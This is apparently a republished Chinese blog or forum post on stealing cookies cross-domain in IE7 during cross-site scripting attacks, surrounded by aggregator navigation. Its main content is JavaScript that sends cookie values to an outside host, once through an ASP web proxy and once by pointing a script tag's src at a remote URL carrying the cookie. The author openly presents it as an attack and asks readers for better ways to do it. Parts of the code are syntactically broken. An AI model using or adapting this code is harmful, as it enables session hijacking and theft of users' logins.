视频1 视频21 视频41 视频61 视频文章1 视频文章21 视频文章41 视频文章61 推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37 推荐39 推荐41 推荐43 推荐45 推荐47 推荐49 关键词1 关键词101 关键词201 关键词301 关键词401 关键词501 关键词601 关键词701 关键词801 关键词901 关键词1001 关键词1101 关键词1201 关键词1301 关键词1401 关键词1501 关键词1601 关键词1701 关键词1801 关键词1901 视频扩展1 视频扩展6 视频扩展11 视频扩展16 文章1 文章201 文章401 文章601 文章801 文章1001 资讯1 资讯501 资讯1001 资讯1501 标签1 标签501 标签1001 关键词1 关键词501 关键词1001 关键词1501 专题2001
ie7下利用ajax跨域盗取cookie的解决办法
2020-11-27 22:52:40 责编:小采
文档
点击下载本文 文档为doc格式

研究了一下午,第一个难题是ajax跨域提交数据,可以用web代理来解决,http://192.168.8.108上的a.htm代码:
<script> 
function getXmlHttpRequest(){ 
       if(window.ActiveXObject){ 
            var ieArr=["Msxml2.XMLHTTP","Microsoft.XMLHTTP"];                 
            for(var i=0;i<ieArr.length;i++) 
                { 
                var xmlhttp= new ActiveXObject(ieArr[i]); 
                } 
                return xmlhttp; 
       } else if(window.XMLHttpRequest){ 
               return new XMLHttpRequest(); 
            }             

    var xmlHttp=getXmlHttpRequest(); 
    xmlHttp.Open("get","http://192.168.8.108/asp/web.asp?url=http://8888.com/2.asp?cookie=mmm",true); 
    xmlHttp.send(null) 

</script> 

其中web.asp是一个asp代理。 

这样直接访问http://192.168.8.108/a.htm是可以成功发送数据的。但是在跨站中,假如我们要跨192.168.8.108的站,这样来讲肯定不能让我们放一个web.asp在上边的,所以这种办法不可行。 

另外,其它的ie7.0下跨站想盗取cookie一般都会用到iframe标签,在没有研究成功ajax发送的情况下,经过搜索发现了另一种跨站的思路,不需要用iframe来跨域提交,代码: 

<script LANGUAGE="Javascript" src="" id="get">  
</script>  
<script LANGUAGE="Javascript">  
<!--  
function get(url)  
    {  
        var obj = document.getElementById("get");  
        obj.src = url;  
        (obj.readStatus == 200)  
        {  
            eval(alert("ok"));  
        }  
    }  
get("http://jb51.net/2.asp?cookie=12345678") 

/*function query()  
    {  
get("http://jb51.net/web/1.img"); //在这里可以写代码,像把alert("ok")里的ok换成变量,1.img 中的代码是var ok="123" 
    }  
//-->  
*/ 

</script> 

至于有其它更好的办法,在IE7下能直接ajax跨域盗取cookie的欢迎讨论 

下载本文
显示全文
专题
懂视 51dongshi.com 版权所有
Copyright © 2019-2025